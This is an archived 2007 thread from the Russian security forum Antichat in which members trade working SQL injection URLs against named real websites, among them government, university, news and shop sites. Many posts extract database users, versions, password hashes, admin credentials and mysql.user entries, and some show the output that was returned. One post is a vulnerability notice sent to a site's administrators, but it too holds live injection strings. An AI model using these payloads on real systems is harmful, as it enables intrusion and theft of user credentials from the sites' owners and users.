ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.09.2007, 22:24
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
otdohni.ws
код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat(table_name,0x3a,column _name),3,4,5+from+information_schema.columns/*
код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,user_password, user_name,user_loginname,user_email),3,4,5+from+de nisvd_db01.e107_user/*
код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,ID_MEMBER,real Name,memberName,memberIP,memberIP2,MSN,emailAddres s,hideEmail,YIM,AIM,ICQ,passwd,passwordSalt),%27CR ACKed%20by%20fobofob%27,4,5+from+doctor_forum.back up_smf_members+limit+115,1/*
а вот тут не понял что за странность с лимитом
код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,user_id,userna me,password,email),3,4,5+from+doctor_almi.av_users/*
дальше не рыл...
|
|
|
25.09.2007, 23:22
|
|
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904
Репутация:
1393
|
|
Сообщение от Termin@L
http://www.themetalcircus.com/noticiadia.php?id=-1+union+select+1,login_name,3,4,5,6,7,8,9,10,11,12 ,13,14+loginform/*
http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-1+union+select+user(),2+from+login/*
PR=8/10
http://www.gametrailers.com/gamepage.php?id=-1+union+select+1,2,3,user(),5,6,7,8,9,10,11,databa se(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29/*
PR=5/10
http://www.michaelpollan.com/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+articles/*
http://michaelyoun.com/index.php?id=336+union+select+1,concat(login,char( 58),pass),3,4,5,6+from+users/*
ЧТО ЭТО? (последняя)
Если не ошибаюсь, то солёный хэш.
|
|
|
|
26.09.2007, 09:35
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
а вот тут не понял что за странность с лимитом
код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,user_id,userna me,password,email),3,4,5+from+doctor_almi.av_users /*
пользуй тогда не лимит, а where
__________________
Карфаген должен быть разрушен...
|
|
|
|
26.09.2007, 17:54
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
http://stepbystep.htmlbook.ru/?id=24+UNION+SELECT+1,2,3/*
Смотрим в самый низ, там где каменты, там наше "блюдо"
Версия 4 какие могут быть имена таблиц на HTML мануале, незнаю...
|
|
|
|
26.09.2007, 18:50
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.edipi.com/guidasw/aziende.php?nzl=N&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version(),0x3a,database()),15,16,17,18 ,19/*
edipi_com25466@wnx-10.seeweb.it:4.0.24_Debian-10sarge1:edipi_com25466
Код:
http://wwwdoska.ru/idv.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0x3a,database()),10,11,12,13,14,15,16,1 7,18,19,20/*
wwwdoska_new@localhost:4.1.22-standard:wwwdoska_new
Код:
http://www.isis.or.ug/news.php?p=5&id=99999+union+select+1,concat(user(),0x3a,version(),0x3a,database( )),3,4,5,6,7,8,9/*
isis@localhost:4.1.20:isis
Код:
http://ss.mak.ac.ug/index.php?act=news&full=true&id=9999+union+select+concat(user(),0x3a,version( ),0x3a,database()),2/*
maktus1_ss@localhost:4.1.22-standard:maktus1_ss
Код:
http://www.unbs.go.ug/news.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3,4/*
unbsdbadmin@localhost:4.1.21:unbs_go_ug
Код:
http://www.nic.co.ug/pg.php?p=media&s=news&Id=9999+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*
niccou_niccou@localhost:4.1.22-standard:niccou_ |
|
|
|
26.09.2007, 19:07
|
|
Познающий
Регистрация: 15.08.2007
Сообщений: 97
Провел на форуме:
366486
Репутация:
100
|
|
http://poderedomex.com/notas.asp?nota_id=1+and+1=convert(int,@@version)--
http://www.yard-saler.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*
http://www.e商店.com/en/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*
http://www.adsjax.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*
http://www.imadspace.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*
http://racecarbroker.net/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*
|
|
|
|
27.09.2007, 02:52
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
Письмо админам ресурса.. было отправлено более недели назад
Здравствуйте, уважаемые!
Довожу до Вашего сведения, что в вашем движке, которому соответствет URL
job.i-files.org, мною обнаружена уязвимость класса SQL-Injection,
позволяющая выполнить произвольный SQL-запрос в базе данных приложения с правами соответствующего пользователя. Пример уязвимости:
1)
http://job.i-files.org/?do=details&id=-448601+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat_ws(0x3A,%20version(),%20user(),%20databa se()),16,17,18,19,20,21,22,23,24/*'&q=%F3&vac=1&razd=0&city=0&photo=0&salary=0&fmt= 2¤cy=0&last_s_id=0
'
5.0.32-Debian_7etch1-log:job@mail.101.com.ua:job
2)
http://job.i-files.org/?do=details&id=-448601+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat_ws(0x3A,table_name,table_schema),16,17,1 8,19,20,21,22,23,24+from+information_schema.tables +where+table_name+like+'%25user%25'/*'&q=%F3&vac=1&razd=0&city=0&photo=0&salary=0&fmt= 2¤cy=0&last_s_id=0
'
ну и так далее)
Прощу принять во внимание предоставленную информацию, и принять меры к
устранению уязвимости пока это не привело к плачевным результатам.
з.ы. админы уведомлены |
|
|
|
27.09.2007, 18:52
|
|
Познающий
Регистрация: 13.01.2007
Сообщений: 96
Провел на форуме:
575156
Репутация:
50
|
|
Код:
http://www.translation.net/kb/index.php?ToDo=browse&catId=-10+union+select+1,2,3,4,5,6,7/*
|
|
|
|
27.09.2007, 21:35
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://bpm.cult.bg/medusa/logs/?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*
bpmsIt3@localhost:4.1.22-log:bpmSite
Код:
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6/*
eunews@localhost:5.0.41-Debian_1-log:eunews
Код:
http://www.humboldt.org.ni/publicaciones.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())/*
humboldt_admin@localhost:4.1.22-standard:humboldt_cms
Код:
http://www.sandra-kuehn.de/aquarium/pics.php?id=9999+union+select+1,2,3,4,aes_decrypt(aes_encrypt(version(),0x71),0x71)/*
Код:
http://www.apotheose.net/pics.php?id=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database())/*
user09710@web04:4.1.20-log:db0971002
Код:
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*
ipetra_ru@localhost:5.0.32-Debian_7etch1-log:ipetra_ru
Код:
http://www.stchristopherclub.com/sub/pics.php?id=-1+union+select+1,concat(user,0x3a,password),3,4+from+mysql.user/*
Код:
http://www.sws-yachts.com/pics.php?pagina=fotoboatyard&Id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*
sws-yachts@localhost:4.1.20:sws-yachts |
|
|
|
27.09.2007, 22:52
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
http://bpm.cult.bg/medusa/logs/?id=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase()),2/*
аськи:
Код:
http://bpm.cult.bg/medusa/logs/?id=-1+union+select+icq,2+from+users/*
логинов с пассами ненашёл 
тотже сайт, но скуля в др месте, циферок бобольше  )
версия таже, таблы теже ..
Код:
http://bpm.cult.bg/users/profile.php?uid=-774+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users/*
Последний раз редактировалось BlackCats; 27.09.2007 в 22:59..
|
|
|
|
|
|
|
|
Здесь присутствуют: 16 (пользователей: 0 , гостей: 16)
|
|
|
|
Похожие темы
Линейный вид
